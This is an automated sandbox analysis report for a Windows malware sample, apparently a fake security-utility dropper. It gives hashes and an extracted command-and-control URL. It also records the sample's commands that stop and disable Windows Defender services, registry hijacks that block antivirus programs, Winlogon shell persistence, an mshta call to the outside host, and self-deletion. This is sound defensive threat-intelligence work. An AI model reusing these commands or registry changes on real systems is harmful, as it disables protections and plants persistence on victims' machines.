Analysis
-
max time kernel
150s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
30-12-2023 00:03
Static task
static1
Behavioral task
behavioral1
Sample
07ea654ba805f82dda0ba70e9014f425.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
07ea654ba805f82dda0ba70e9014f425.exe
Resource
win10v2004-20231215-en
General
-
Target
07ea654ba805f82dda0ba70e9014f425.exe
-
Size
1.7MB
-
MD5
07ea654ba805f82dda0ba70e9014f425
-
SHA1
f55a8b8c68ff0dd9ce65826ec36430279ddb13c7
-
SHA256
04dda7bb206088660114542dc8ca36b2a1b94f3ffc5347289af449f12bcedca9
-
SHA512
0fb3d6845d47c5a70f7c77f8ff705361a71b4c5b4b94e9721af8788cbaa7b6d3c9212f803b92392659f2946ebdb9e69440e99e0630198ae3e98c70d97e9d5440
-
SSDEEP
49152:y8OU0+IDBPLyNP6RqiLMWhc9mvtzTI6W3gvS1pjtU2Z/9YD:y890dLyNCsWMWhnztWCS1pjNgD
Malware Config
Extracted
http://pcprotectionutility.com/favicon.ico?0=72&1=0&2=1&3=57&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
qpvyle.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\qpvyle.exe" qpvyle.exe -
Sets file execution options in registry 2 TTPs 16 IoCs
Processes:
qpvyle.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" qpvyle.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe qpvyle.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe qpvyle.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe qpvyle.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe qpvyle.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" qpvyle.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe qpvyle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe qpvyle.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" qpvyle.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 772 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
qpvyle.exepid process 2616 qpvyle.exe -
Loads dropped DLL 2 IoCs
Processes:
07ea654ba805f82dda0ba70e9014f425.exepid process 2528 07ea654ba805f82dda0ba70e9014f425.exe 2528 07ea654ba805f82dda0ba70e9014f425.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exepid process 1320 sc.exe 2684 sc.exe 2824 sc.exe 2120 sc.exe 1684 sc.exe 1656 sc.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
qpvyle.exepid process 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
qpvyle.exedescription pid process Token: SeDebugPrivilege 2616 qpvyle.exe Token: SeShutdownPrivilege 2616 qpvyle.exe Token: SeDebugPrivilege 2616 qpvyle.exe Token: SeShutdownPrivilege 2616 qpvyle.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
qpvyle.exepid process 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe 2616 qpvyle.exe -
Suspicious use of WriteProcessMemory 52 IoCs
Processes:
07ea654ba805f82dda0ba70e9014f425.exenet.exeqpvyle.exenet.exedescription pid process target process PID 2528 wrote to memory of 2684 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2684 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2684 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2684 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2824 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2824 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2824 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2824 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2740 2528 07ea654ba805f82dda0ba70e9014f425.exe net.exe PID 2528 wrote to memory of 2740 2528 07ea654ba805f82dda0ba70e9014f425.exe net.exe PID 2528 wrote to memory of 2740 2528 07ea654ba805f82dda0ba70e9014f425.exe net.exe PID 2528 wrote to memory of 2740 2528 07ea654ba805f82dda0ba70e9014f425.exe net.exe PID 2528 wrote to memory of 2120 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2120 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2120 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2120 2528 07ea654ba805f82dda0ba70e9014f425.exe sc.exe PID 2528 wrote to memory of 2616 2528 07ea654ba805f82dda0ba70e9014f425.exe qpvyle.exe PID 2528 wrote to memory of 2616 2528 07ea654ba805f82dda0ba70e9014f425.exe qpvyle.exe PID 2528 wrote to memory of 2616 2528 07ea654ba805f82dda0ba70e9014f425.exe qpvyle.exe PID 2528 wrote to memory of 2616 2528 07ea654ba805f82dda0ba70e9014f425.exe qpvyle.exe PID 2528 wrote to memory of 772 2528 07ea654ba805f82dda0ba70e9014f425.exe cmd.exe PID 2528 wrote to memory of 772 2528 07ea654ba805f82dda0ba70e9014f425.exe cmd.exe PID 2528 wrote to memory of 772 2528 07ea654ba805f82dda0ba70e9014f425.exe cmd.exe PID 2528 wrote to memory of 772 2528 07ea654ba805f82dda0ba70e9014f425.exe cmd.exe PID 2740 wrote to memory of 1344 2740 net.exe net1.exe PID 2740 wrote to memory of 1344 2740 net.exe net1.exe PID 2740 wrote to memory of 1344 2740 net.exe net1.exe PID 2740 wrote to memory of 1344 2740 net.exe net1.exe PID 2616 wrote to memory of 1320 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1320 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1320 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1320 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1656 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1656 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1656 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1656 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 2540 2616 qpvyle.exe net.exe PID 2616 wrote to memory of 2540 2616 qpvyle.exe net.exe PID 2616 wrote to memory of 2540 2616 qpvyle.exe net.exe PID 2616 wrote to memory of 2540 2616 qpvyle.exe net.exe PID 2616 wrote to memory of 1684 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1684 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1684 2616 qpvyle.exe sc.exe PID 2616 wrote to memory of 1684 2616 qpvyle.exe sc.exe PID 2540 wrote to memory of 2840 2540 net.exe net1.exe PID 2540 wrote to memory of 2840 2540 net.exe net1.exe PID 2540 wrote to memory of 2840 2540 net.exe net1.exe PID 2540 wrote to memory of 2840 2540 net.exe net1.exe PID 2616 wrote to memory of 2148 2616 qpvyle.exe mshta.exe PID 2616 wrote to memory of 2148 2616 qpvyle.exe mshta.exe PID 2616 wrote to memory of 2148 2616 qpvyle.exe mshta.exe PID 2616 wrote to memory of 2148 2616 qpvyle.exe mshta.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\07ea654ba805f82dda0ba70e9014f425.exe"C:\Users\Admin\AppData\Local\Temp\07ea654ba805f82dda0ba70e9014f425.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exeC:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exe2⤵
- Modifies WinLogon for persistence
- Sets file execution options in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://pcprotectionutility.com/favicon.ico?0=72&1=0&2=1&3=57&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000"3⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\07EA65~1.EXE" >> NUL2⤵
- Deletes itself
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exeFilesize
832KB
MD559f4725cddacdd598306f16bb6146deb
SHA1fbfcc277630ac1a47141523f4fbf35bb05025ab3
SHA2563c4d3250f05eb2bf38737116d51f44e9982115db800c50c04d9f1b5bb6f05529
SHA5129b4669d8e8d78753b9dd42d340deea62de2a4f84cfa9e026561848d1fa294bbb15284ed504f5279025a42d3637e77310d4d8a901edd86bc8aa8eaba658455535
-
C:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exeFilesize
768KB
MD5b1b74f7f95f9eb861091ae2da1d47a54
SHA1a517a8b5c733f9b7f1f8ee9d0e1a25730cac975f
SHA2567f4da5fe59093ac6aeed4d8478f11c64956b1e19ddb62c0b55a7c2294ed7582b
SHA512c2be21b76a59c94e833558266923b03356d98474600455f62a19b60bf7db320c513d2c4b3c30e71bbc450e01e162394f9d8f3a1a43c78bbed9d451438462afa2
-
\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exeFilesize
1.7MB
MD507ea654ba805f82dda0ba70e9014f425
SHA1f55a8b8c68ff0dd9ce65826ec36430279ddb13c7
SHA25604dda7bb206088660114542dc8ca36b2a1b94f3ffc5347289af449f12bcedca9
SHA5120fb3d6845d47c5a70f7c77f8ff705361a71b4c5b4b94e9721af8788cbaa7b6d3c9212f803b92392659f2946ebdb9e69440e99e0630198ae3e98c70d97e9d5440
-
\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exeFilesize
988KB
MD533b5337eddb280e153a217cb9b595d59
SHA1be11a003d0c972d456174e1dde24036b5eb11a68
SHA2564bafc2f41843d49d4643a678ada7918d31a165f4354462193d29ee94521d4e37
SHA5126792f453d43a256620a76ad93287604c99717839d90be358ccbc64760e857c47fc50ac8f8af37256a3739b36eeb1cc2ec1e4075d581b56fa08e1e8d522003914
-
memory/2528-24-0x0000000003390000-0x0000000003391000-memory.dmpFilesize
4KB
-
memory/2528-13-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/2528-7-0x00000000032F0000-0x00000000032F1000-memory.dmpFilesize
4KB
-
memory/2528-8-0x00000000032E0000-0x00000000032E2000-memory.dmpFilesize
8KB
-
memory/2528-6-0x00000000007A0000-0x00000000007A1000-memory.dmpFilesize
4KB
-
memory/2528-22-0x0000000003370000-0x0000000003371000-memory.dmpFilesize
4KB
-
memory/2528-4-0x0000000000780000-0x0000000000781000-memory.dmpFilesize
4KB
-
memory/2528-3-0x0000000000710000-0x0000000000711000-memory.dmpFilesize
4KB
-
memory/2528-2-0x0000000000720000-0x0000000000721000-memory.dmpFilesize
4KB
-
memory/2528-9-0x00000000033C0000-0x0000000003500000-memory.dmpFilesize
1.2MB
-
memory/2528-10-0x0000000003330000-0x0000000003331000-memory.dmpFilesize
4KB
-
memory/2528-11-0x00000000032D0000-0x00000000032D2000-memory.dmpFilesize
8KB
-
memory/2528-12-0x0000000003340000-0x0000000003341000-memory.dmpFilesize
4KB
-
memory/2528-21-0x0000000002710000-0x0000000002711000-memory.dmpFilesize
4KB
-
memory/2528-14-0x0000000000250000-0x0000000000251000-memory.dmpFilesize
4KB
-
memory/2528-15-0x0000000003300000-0x0000000003301000-memory.dmpFilesize
4KB
-
memory/2528-16-0x00000000007F0000-0x00000000007F1000-memory.dmpFilesize
4KB
-
memory/2528-37-0x0000000003580000-0x0000000003581000-memory.dmpFilesize
4KB
-
memory/2528-36-0x0000000003590000-0x0000000003591000-memory.dmpFilesize
4KB
-
memory/2528-35-0x0000000003560000-0x0000000003561000-memory.dmpFilesize
4KB
-
memory/2528-34-0x0000000003570000-0x0000000003571000-memory.dmpFilesize
4KB
-
memory/2528-33-0x0000000003540000-0x0000000003541000-memory.dmpFilesize
4KB
-
memory/2528-32-0x0000000003550000-0x0000000003551000-memory.dmpFilesize
4KB
-
memory/2528-31-0x0000000003520000-0x0000000003521000-memory.dmpFilesize
4KB
-
memory/2528-30-0x0000000003530000-0x0000000003531000-memory.dmpFilesize
4KB
-
memory/2528-20-0x0000000003350000-0x0000000003351000-memory.dmpFilesize
4KB
-
memory/2528-28-0x0000000003510000-0x0000000003511000-memory.dmpFilesize
4KB
-
memory/2528-27-0x00000000033A0000-0x00000000033A1000-memory.dmpFilesize
4KB
-
memory/2528-26-0x00000000033B0000-0x00000000033B1000-memory.dmpFilesize
4KB
-
memory/2528-25-0x0000000003380000-0x0000000003381000-memory.dmpFilesize
4KB
-
memory/2528-0-0x0000000000400000-0x000000000070C000-memory.dmpFilesize
3.0MB
-
memory/2528-23-0x0000000003360000-0x0000000003361000-memory.dmpFilesize
4KB
-
memory/2528-5-0x0000000000750000-0x0000000000751000-memory.dmpFilesize
4KB
-
memory/2528-1-0x0000000000730000-0x0000000000731000-memory.dmpFilesize
4KB
-
memory/2528-29-0x0000000003500000-0x0000000003501000-memory.dmpFilesize
4KB
-
memory/2528-19-0x00000000025B0000-0x00000000025B1000-memory.dmpFilesize
4KB
-
memory/2528-18-0x0000000002660000-0x0000000002661000-memory.dmpFilesize
4KB
-
memory/2528-17-0x0000000000390000-0x0000000000391000-memory.dmpFilesize
4KB
-
memory/2528-49-0x0000000003660000-0x0000000003661000-memory.dmpFilesize
4KB
-
memory/2528-48-0x0000000003640000-0x0000000003641000-memory.dmpFilesize
4KB
-
memory/2528-47-0x0000000003650000-0x0000000003651000-memory.dmpFilesize
4KB
-
memory/2528-46-0x0000000003620000-0x0000000003621000-memory.dmpFilesize
4KB
-
memory/2528-45-0x0000000003630000-0x0000000003631000-memory.dmpFilesize
4KB
-
memory/2528-44-0x0000000003600000-0x0000000003601000-memory.dmpFilesize
4KB
-
memory/2528-43-0x0000000003610000-0x0000000003611000-memory.dmpFilesize
4KB
-
memory/2528-42-0x00000000035E0000-0x00000000035E1000-memory.dmpFilesize
4KB
-
memory/2528-41-0x00000000035F0000-0x00000000035F1000-memory.dmpFilesize
4KB
-
memory/2528-40-0x00000000035C0000-0x00000000035C1000-memory.dmpFilesize
4KB
-
memory/2528-39-0x00000000035D0000-0x00000000035D1000-memory.dmpFilesize
4KB
-
memory/2528-38-0x00000000035A0000-0x00000000035A1000-memory.dmpFilesize
4KB
-
memory/2528-50-0x00000000003A0000-0x00000000003FA000-memory.dmpFilesize
360KB
-
memory/2528-51-0x00000000035B0000-0x00000000035B1000-memory.dmpFilesize
4KB
-
memory/2528-58-0x0000000003830000-0x0000000003831000-memory.dmpFilesize
4KB
-
memory/2528-57-0x0000000003810000-0x0000000003811000-memory.dmpFilesize
4KB
-
memory/2528-56-0x0000000003820000-0x0000000003821000-memory.dmpFilesize
4KB
-
memory/2528-55-0x00000000037F0000-0x00000000037F1000-memory.dmpFilesize
4KB
-
memory/2528-54-0x0000000003800000-0x0000000003801000-memory.dmpFilesize
4KB
-
memory/2528-53-0x00000000037D0000-0x00000000037D1000-memory.dmpFilesize
4KB
-
memory/2528-52-0x00000000037E0000-0x00000000037E1000-memory.dmpFilesize
4KB
-
memory/2528-59-0x0000000003840000-0x0000000003841000-memory.dmpFilesize
4KB
-
memory/2528-63-0x00000000041D0000-0x00000000044DC000-memory.dmpFilesize
3.0MB
-
memory/2528-71-0x00000000041D0000-0x00000000041D1000-memory.dmpFilesize
4KB
-
memory/2528-66-0x00000000041D0000-0x00000000044DC000-memory.dmpFilesize
3.0MB
-
memory/2528-74-0x0000000000400000-0x000000000070C000-memory.dmpFilesize
3.0MB
-
memory/2616-70-0x0000000000400000-0x000000000070C000-memory.dmpFilesize
3.0MB